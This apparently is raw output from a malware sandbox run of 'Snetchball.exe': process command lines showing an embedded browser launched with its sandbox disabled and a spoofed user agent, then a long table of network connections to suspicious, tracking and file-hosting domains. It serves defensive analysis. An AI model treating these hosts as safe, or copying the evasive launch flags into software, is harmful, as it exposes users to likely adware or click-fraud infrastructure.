"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2756 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2764,i,8143926454750315634,5060155449748382924,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 104.21.20.211:443 | nxt-psh.com | tcp |
| RU | 93.158.134.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.20.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.134.158.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| GB | 92.123.143.169:80 | apps.identrust.com | tcp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| GB | 142.250.200.46:443 | play.google.com | udp |
| US | 104.21.70.174:443 | senzamenuzaes.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 87.250.251.232:443 | sba.yandex.ru | tcp |
| US | 104.26.8.202:443 | grabify.link | tcp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 87.250.251.232:443 | sba.yandex.ru | tcp |
| US | 104.26.8.202:443 | grabify.link | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 104.21.73.21:443 | z3n.mom | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| GB | 162.125.64.16:443 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
| US | 162.125.21.3:443 | beacon.dropbox.com | tcp |
| US | 162.125.21.3:443 | beacon.dropbox.com | tcp |
| NL | 142.250.102.84:443 | accounts.google.com | udp |
| GB | 18.172.89.76:443 | fp.dropbox.com | tcp |
| US | 172.67.143.173:443 | stockframe.site | tcp |
| RU | 95.163.241.63:80 | 95.163.241.63 | tcp |
| DE | 18.196.235.131:3478 | use1-turn.fpjs.io | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| N/A | 10.127.0.143:63179 | udp | |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| GB | 142.250.200.46:443 | play.google.com | udp |
| NL | 82.145.216.23:443 | download.opera.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| GB | 2.17.209.124:443 | download3.operacdn.com | tcp |
| GB | 13.224.245.43:443 | cdn.dropboxexperiment.com | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| GB | 92.123.143.169:80 | apps.identrust.com | tcp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | i0c.xyz | udp |
| US | 8.8.8.8:53 | i0c.xyz | udp |
| SG | 104.248.96.70:443 | i0c.xyz | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | renogy.sjv.io | udp |
| US | 8.8.8.8:53 | renogy.sjv.io | udp |
| US | 35.227.211.136:443 | renogy.sjv.io | tcp |
| US | 44.240.96.128:80 | api4.check-data.xyz | tcp |
| US | 8.8.8.8:53 | www.ojrq.net | udp |
| US | 8.8.8.8:53 | www.ojrq.net | udp |
| US | 34.95.127.121:443 | www.ojrq.net | tcp |
| US | 35.227.211.136:443 | renogy.sjv.io | udp |
| US | 8.8.8.8:53 | www.renogy.com | udp |
| US | 8.8.8.8:53 | www.renogy.com | udp |
| US | 192.200.160.13:443 | www.renogy.com | tcp |
| US | 8.8.8.8:53 | static.klaviyo.com | udp |
| US | 8.8.8.8:53 | static.klaviyo.com | udp |
| US | 8.8.8.8:53 | cdn11.bigcommerce.com | udp |
| US | 8.8.8.8:53 | cdn11.bigcommerce.com | udp |
| US | 8.8.8.8:53 | dynamic.criteo.com | udp |
| US | 8.8.8.8:53 | dynamic.criteo.com | udp |
| US | 8.8.8.8:53 | asset.fwcdn3.com | udp |
| US | 8.8.8.8:53 | asset.fwcdn3.com | udp |
| US | 8.8.8.8:53 | cdn.pushowl.com | udp |
| US | 8.8.8.8:53 | cdn.pushowl.com | udp |
| US | 151.101.2.133:443 | static.klaviyo.com | tcp |
| US | 192.200.160.253:443 | cdn11.bigcommerce.com | tcp |
| US | 192.200.160.253:443 | cdn11.bigcommerce.com | tcp |
| US | 192.200.160.253:443 | cdn11.bigcommerce.com | tcp |
| NL | 178.250.1.13:443 | dynamic.criteo.com | tcp |
| US | 34.111.196.223:443 | asset.fwcdn3.com | tcp |
| US | 34.111.196.223:443 | asset.fwcdn3.com | tcp |
| GB | 18.239.236.49:443 | cdn.pushowl.com | tcp |
| US | 34.111.196.223:443 | asset.fwcdn3.com | udp |
| US | 192.200.160.253:443 | cdn11.bigcommerce.com | udp |
| US | 8.8.8.8:53 | microapps.bigcommerce.com | udp |
| US | 8.8.8.8:53 | microapps.bigcommerce.com | udp |
| US | 8.8.8.8:53 | sdk.helloextend.com | udp |
| US | 8.8.8.8:53 | sdk.helloextend.com | udp |
| US | 8.8.8.8:53 | store-fhnch.mybigcommerce.com | udp |
| US | 8.8.8.8:53 | store-fhnch.mybigcommerce.com | udp |
| US | 34.117.232.248:443 | microapps.bigcommerce.com | tcp |
| GB | 54.230.10.13:443 | sdk.helloextend.com | tcp |
| GB | 54.230.10.13:443 | sdk.helloextend.com | tcp |
| US | 192.200.160.13:443 | store-fhnch.mybigcommerce.com | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | 223.196.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.236.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.232.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.10.230.54.in-addr.arpa | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | dev.visualwebsiteoptimizer.com | udp |
| US | 8.8.8.8:53 | dev.visualwebsiteoptimizer.com | udp |
| US | 8.8.8.8:53 | bes.gcp.data.bigcommerce.com | udp |
| US | 8.8.8.8:53 | bes.gcp.data.bigcommerce.com | udp |
| US | 8.8.8.8:53 | tracking-cdn.figpii.com | udp |
| US | 8.8.8.8:53 | tracking-cdn.figpii.com | udp |
| US | 34.96.102.137:443 | dev.visualwebsiteoptimizer.com | tcp |
| US | 34.111.131.117:443 | bes.gcp.data.bigcommerce.com | tcp |
| US | 151.101.129.91:443 | tracking-cdn.figpii.com | tcp |
| US | 8.8.8.8:53 | usrwy.com | udp |
| US | 8.8.8.8:53 | usrwy.com | udp |
| US | 8.8.8.8:53 | a.klaviyo.com | udp |
| US | 8.8.8.8:53 | a.klaviyo.com | udp |
| US | 8.8.8.8:53 | www.dwin1.com | udp |
| US | 8.8.8.8:53 | www.dwin1.com | udp |
| US | 8.8.8.8:53 | checkout-sdk.bigcommerce.com | udp |
| US | 8.8.8.8:53 | checkout-sdk.bigcommerce.com | udp |
| US | 8.8.8.8:53 | static.indoleads.com | udp |
| US | 8.8.8.8:53 | static.indoleads.com | udp |
| US | 151.101.129.91:443 | tracking-cdn.figpii.com | tcp |
| GB | 108.138.233.116:443 | usrwy.com | tcp |
| US | 104.18.12.240:443 | a.klaviyo.com | tcp |
| US | 104.26.15.102:443 | static.indoleads.com | udp |
| GB | 108.138.233.123:443 | www.dwin1.com | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 8.8.8.8:53 | d2lz7267o80s75.cloudfront.net | udp |
| US | 8.8.8.8:53 | d2lz7267o80s75.cloudfront.net | udp |
| US | 34.111.131.117:443 | bes.gcp.data.bigcommerce.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 151.101.2.133:443 | static.klaviyo.com | tcp |
| US | 8.8.8.8:53 | usaincreasingly.increasingly.co | udp |
| US | 8.8.8.8:53 | usaincreasingly.increasingly.co | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 151.101.194.137:443 | code.jquery.com | tcp |
| US | 8.8.8.8:53 | tvspix.com | udp |
| US | 8.8.8.8:53 | tvspix.com | udp |
| GB | 52.85.142.157:443 | d2lz7267o80s75.cloudfront.net | tcp |
| NL | 157.240.247.8:443 | connect.facebook.net | tcp |
| US | 54.81.24.204:443 | usaincreasingly.increasingly.co | tcp |
| US | 13.107.21.237:443 | bat.bing.com | tcp |
| US | 52.11.48.205:443 | tvspix.com | tcp |
| US | 8.8.8.8:53 | fireworkapi1.com | udp |
| US | 8.8.8.8:53 | fireworkapi1.com | udp |
| US | 8.8.8.8:53 | fireworkadservices1.com | udp |
| US | 8.8.8.8:53 | fireworkadservices1.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 3.33.246.75:443 | fireworkadservices1.com | tcp |
| US | 3.33.246.75:443 | fireworkadservices1.com | tcp |
| US | 3.33.246.75:443 | fireworkadservices1.com | tcp |
| US | 8.8.8.8:53 | sessions.bugsnag.com | udp |
| US | 8.8.8.8:53 | sessions.bugsnag.com | udp |
| US | 8.8.8.8:53 | tracking-settings.figpii.com | udp |
| US | 8.8.8.8:53 | tracking-settings.figpii.com | udp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| US | 35.190.88.7:443 | sessions.bugsnag.com | tcp |
| US | 8.8.8.8:53 | sleeknotecustomerscripts.sleeknote.com | udp |
| US | 8.8.8.8:53 | sleeknotecustomerscripts.sleeknote.com | udp |
| US | 8.8.8.8:53 | pixeltrack.clientgear.com | udp |
| US | 8.8.8.8:53 | pixeltrack.clientgear.com | udp |
| US | 8.8.8.8:53 | static-tracking.klaviyo.com | udp |
| US | 8.8.8.8:53 | static-tracking.klaviyo.com | udp |
| US | 151.101.130.133:443 | static-tracking.klaviyo.com | tcp |
| GB | 18.239.236.49:443 | cdn.pushowl.com | udp |
| US | 192.200.160.253:443 | checkout-sdk.bigcommerce.com | udp |
| GB | 13.224.132.42:443 | sleeknotecustomerscripts.sleeknote.com | tcp |
| US | 104.26.15.102:443 | static.indoleads.com | udp |
| US | 3.33.246.75:443 | fireworkadservices1.com | tcp |
| US | 151.101.130.133:443 | static-tracking.klaviyo.com | tcp |
| US | 8.8.8.8:53 | utt.impactcdn.com | udp |
| US | 8.8.8.8:53 | utt.impactcdn.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 192.200.160.13:443 | store-fhnch.mybigcommerce.com | udp |
| US | 8.8.8.8:53 | 137.194.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.142.85.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.24.81.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.246.33.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.88.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.223.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.48.11.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.132.224.13.in-addr.arpa | udp |
| US | 35.186.249.72:443 | utt.impactcdn.com | tcp |
| US | 8.8.8.8:53 | www.mczbf.com | udp |
| US | 8.8.8.8:53 | www.mczbf.com | udp |
| US | 192.200.160.13:443 | store-fhnch.mybigcommerce.com | udp |
| US | 8.8.8.8:53 | shop.pe | udp |
| US | 8.8.8.8:53 | shop.pe | udp |
| US | 8.8.8.8:53 | webtrafficsource.com | udp |
| US | 8.8.8.8:53 | webtrafficsource.com | udp |
| US | 8.8.8.8:53 | officialweb.renogy-dchome.com | udp |
| US | 8.8.8.8:53 | officialweb.renogy-dchome.com | udp |
| GB | 108.156.39.37:443 | www.mczbf.com | tcp |
| GB | 79.133.176.188:443 | pixeltrack.clientgear.com | tcp |
| US | 35.227.244.1:443 | shop.pe | tcp |
| US | 34.107.149.195:443 | webtrafficsource.com | tcp |
| US | 8.8.8.8:53 | us.sobot.com | udp |
| US | 8.8.8.8:53 | us.sobot.com | udp |
| GB | 18.165.227.118:443 | us.sobot.com | tcp |
| US | 8.8.8.8:53 | cdn.userway.org | udp |
| US | 8.8.8.8:53 | cdn.userway.org | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | p2.fwpixel.com | udp |
| US | 8.8.8.8:53 | p2.fwpixel.com | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 35.190.88.7:443 | sessions.bugsnag.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | fast.a.klaviyo.com | udp |
| US | 8.8.8.8:53 | fast.a.klaviyo.com | udp |
| US | 8.8.8.8:53 | static-forms.klaviyo.com | udp |
| US | 8.8.8.8:53 | static-forms.klaviyo.com | udp |
| GB | 52.85.142.157:443 | d2lz7267o80s75.cloudfront.net | tcp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 54.70.177.139:443 | p2.fwpixel.com | tcp |
| GB | 84.17.50.8:443 | cdn.userway.org | tcp |
| NL | 157.240.247.8:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 3.33.246.75:443 | fireworkadservices1.com | tcp |
| US | 8.8.8.8:53 | rr.figpii.com | udp |
| US | 8.8.8.8:53 | rr.figpii.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | cdn.statstrk01.com | udp |
| US | 8.8.8.8:53 | cdn.statstrk01.com | udp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| US | 151.101.194.133:443 | static-forms.klaviyo.com | tcp |
| US | 151.101.130.133:443 | static-forms.klaviyo.com | tcp |
| US | 52.46.151.131:443 | s.amazon-adsystem.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| GB | 172.217.16.227:443 | www.google.co.uk | udp |
| US | 172.67.72.173:443 | rr.figpii.com | udp |
| US | 71.6.106.91:443 | cdn.statstrk01.com | tcp |
| US | 8.8.8.8:53 | fullstory.com | udp |
| US | 8.8.8.8:53 | fullstory.com | udp |
| US | 8.8.8.8:53 | cdn.attn.tv | udp |
| US | 8.8.8.8:53 | cdn.attn.tv | udp |
| US | 147.75.40.150:443 | fullstory.com | tcp |
| US | 198.11.174.6:443 | officialweb.renogy-dchome.com | tcp |
| GB | 108.138.217.33:443 | cdn.attn.tv | tcp |
| US | 8.8.8.8:53 | dataaccess.renogy.cn | udp |
| US | 8.8.8.8:53 | dataaccess.renogy.cn | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| BE | 74.125.71.157:443 | stats.g.doubleclick.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.151.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.217.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.177.70.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.40.75.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.106.6.71.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.174.11.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.71.125.74.in-addr.arpa | udp |
| US | 47.88.100.98:443 | dataaccess.renogy.cn | tcp |
| US | 8.8.8.8:53 | api.pushowl.com | udp |
| US | 8.8.8.8:53 | api.pushowl.com | udp |
| US | 47.88.100.98:443 | dataaccess.renogy.cn | tcp |
| US | 47.88.100.98:443 | dataaccess.renogy.cn | tcp |
| US | 8.8.8.8:53 | d2mjzob2nc713b.cloudfront.net | udp |
| US | 8.8.8.8:53 | d2mjzob2nc713b.cloudfront.net | udp |
| US | 34.201.253.202:443 | api.pushowl.com | tcp |
| GB | 52.84.90.111:443 | d2mjzob2nc713b.cloudfront.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | sleeknotestaticcontent.sleeknote.com | udp |
| US | 8.8.8.8:53 | sleeknotestaticcontent.sleeknote.com | udp |
| US | 8.8.8.8:53 | www.fullstory.com | udp |
| US | 8.8.8.8:53 | www.fullstory.com | udp |
| US | 8.8.8.8:53 | trafficwisehub.com | udp |
| US | 8.8.8.8:53 | trafficwisehub.com | udp |
| US | 8.8.8.8:53 | pixel.adfyier.com | udp |
| US | 8.8.8.8:53 | pixel.adfyier.com | udp |
| GB | 18.165.201.59:443 | sleeknotestaticcontent.sleeknote.com | tcp |
| GB | 3.9.51.5:443 | www.fullstory.com | tcp |
| US | 24.144.64.51:443 | pixel.adfyier.com | tcp |
| US | 203.161.33.68:443 | trafficwisehub.com | tcp |
| US | 3.33.246.75:443 | fireworkadservices1.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| GB | 108.156.39.37:443 | www.mczbf.com | tcp |
| US | 8.8.8.8:53 | scripts.prdredir.com | udp |
| US | 8.8.8.8:53 | scripts.prdredir.com | udp |
| US | 34.107.149.195:443 | webtrafficsource.com | udp |
| US | 8.8.8.8:53 | event.clientgear.com | udp |
| US | 8.8.8.8:53 | event.clientgear.com | udp |
| US | 104.18.30.27:443 | scripts.prdredir.com | tcp |
| US | 8.8.8.8:53 | api.userway.org | udp |
| US | 8.8.8.8:53 | api.userway.org | udp |
| US | 47.252.78.131:443 | event.clientgear.com | tcp |
| US | 54.187.63.239:443 | api.userway.org | tcp |
| US | 8.8.8.8:53 | rd.afftrack.pro | udp |
| US | 8.8.8.8:53 | rd.afftrack.pro | udp |
| US | 8.8.8.8:53 | mate-api.renogy.com | udp |
| US | 8.8.8.8:53 | mate-api.renogy.com | udp |
| US | 8.8.8.8:53 | trkwwtarget.com | udp |
| US | 8.8.8.8:53 | trkwwtarget.com | udp |
| US | 8.8.8.8:53 | userlogic.org | udp |
| US | 8.8.8.8:53 | userlogic.org | udp |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 172.67.176.160:443 | userlogic.org | udp |
| US | 24.144.64.51:443 | rd.afftrack.pro | tcp |
| US | 34.102.156.140:443 | trkwwtarget.com | tcp |
| US | 104.21.7.21:443 | udp | |
| US | 149.28.34.15:443 | tcp | |
| DE | 151.106.40.181:443 | tcp | |
| AU | 54.79.63.246:443 | tcp | |
| US | 8.8.8.8:53 | mate-api.renogy.com | udp |
| US | 8.8.8.8:53 | mate-api.renogy.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 216.58.201.102:443 | tcp | |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 34.95.127.121:443 | www.ojrq.net | udp |
| GB | 18.165.201.73:443 | sleeknotestaticcontent.sleeknote.com | udp |
| GB | 142.250.180.22:443 | tcp | |
| GB | 142.250.180.22:443 | tcp | |
| GB | 157.240.221.35:443 | tcp | |
| US | 203.161.33.68:443 | trafficwisehub.com | tcp |
| US | 104.18.43.135:443 | udp | |
| US | 104.18.39.221:443 | udp | |
| DE | 151.106.40.181:443 | tcp | |
| GB | 142.250.180.22:443 | udp | |
| US | 34.102.156.140:443 | trkwwtarget.com | udp |
| GB | 84.17.50.8:443 | cdn.userway.org | tcp |
| US | 149.28.34.15:443 | tcp | |
| GB | 142.250.200.46:443 | www.youtube.com | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | tcp |
| GB | 142.250.187.193:443 | tcp | |
| CN | 203.107.41.32:443 | tcp | |
| GB | 18.172.89.55:443 | tcp | |
| GB | 142.250.187.193:443 | tcp | |
| CN | 203.107.41.32:443 | tcp | |
| CN | 59.110.94.201:443 | tcp | |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| CN | 59.110.94.201:443 | tcp | |
| US | 3.33.246.75:443 | fireworkadservices1.com | tcp |
| AU | 54.79.63.246:443 | tcp | |
| US | 104.21.80.88:443 | userlogic.org | udp |
| US | 216.239.36.21:443 | tcp | |
| US | 34.111.196.223:443 | asset.fwcdn3.com | udp |
| US | 47.253.61.56:443 | tcp | |
| AU | 54.79.63.246:443 | tcp | |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 44.240.96.128:443 | api5.tracemonitors.com | tcp |
| US | 34.117.19.225:443 | tcp | |
| KZ | 185.22.66.16:80 | www.rapidfilestorage.com | tcp |
| NL | 178.250.1.9:443 | tcp | |
| US | 34.117.19.225:443 | udp | |
| US | 74.119.117.16:443 | tcp | |
